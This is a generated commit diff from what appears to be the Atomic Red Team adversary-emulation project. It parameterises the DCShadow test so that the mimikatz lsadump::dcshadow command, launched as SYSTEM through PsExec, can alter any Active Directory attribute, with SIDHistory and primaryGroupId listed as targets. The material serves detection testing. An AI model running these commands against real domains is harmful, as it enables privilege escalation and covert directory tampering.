Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
This commit is contained in:
CircleCI Atomic Red Team doc generator
parent
18087c9ad8
commit
9c1f9f733c
@@ -38149,11 +38149,20 @@ defense-evasion:
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
user:
|
||||
description: Targeted user (for machine account do not forget to add final
|
||||
object:
|
||||
description: Targeted object (for machine account do not forget to add final
|
||||
'$')
|
||||
type: string
|
||||
default: CLIENT1$
|
||||
default: bruce.wayne
|
||||
attribute:
|
||||
description: 'Object attribute to edit, interesting ones: badpwdcount, primaryGroupId,
|
||||
SIDHistory...'
|
||||
type: string
|
||||
default: badpwdcount
|
||||
value:
|
||||
description: Value to assign to object attribute
|
||||
type: string
|
||||
default: 9999
|
||||
mimikatz_path:
|
||||
description: Mimikatz windows executable
|
||||
type: path
|
||||
@@ -38196,7 +38205,7 @@ defense-evasion:
|
||||
# starting fake DC server, as SYSTEM (required)
|
||||
$dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log"
|
||||
Remove-Item $dc_output_file -ErrorAction Ignore
|
||||
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`""
|
||||
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`""
|
||||
$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam"
|
||||
|
||||
# wait for fake DC server to be ready...
|
||||
@@ -38210,6 +38219,7 @@ defense-evasion:
|
||||
|
||||
Write-Host "`nOutput from fake DC server:"
|
||||
Get-Content $dc_output_file
|
||||
Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it
|
||||
Remove-Item $dc_output_file -ErrorAction Ignore
|
||||
|
||||
Write-Host "End of DCShadow"
|
||||
|
||||
@@ -33,7 +33,9 @@ The easiest is to run elevated and as a Domain Admin user.
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| user | Targeted user (for machine account do not forget to add final '$') | string | CLIENT1$|
|
||||
| object | Targeted object (for machine account do not forget to add final '$') | string | bruce.wayne|
|
||||
| attribute | Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... | string | badpwdcount|
|
||||
| value | Value to assign to object attribute | string | 9999|
|
||||
| mimikatz_path | Mimikatz windows executable | path | $env:TEMP\mimikatz\x64\mimikatz.exe|
|
||||
| psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe|
|
||||
|
||||
@@ -45,7 +47,7 @@ The easiest is to run elevated and as a Domain Admin user.
|
||||
# starting fake DC server, as SYSTEM (required)
|
||||
$dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log"
|
||||
Remove-Item $dc_output_file -ErrorAction Ignore
|
||||
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`""
|
||||
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`""
|
||||
$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam"
|
||||
|
||||
# wait for fake DC server to be ready...
|
||||
@@ -59,6 +61,7 @@ Wait-Process $dc
|
||||
|
||||
Write-Host "`nOutput from fake DC server:"
|
||||
Get-Content $dc_output_file
|
||||
Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it
|
||||
Remove-Item $dc_output_file -ErrorAction Ignore
|
||||
|
||||
Write-Host "End of DCShadow"
|
||||
|
||||
Reference in New Issue
Block a user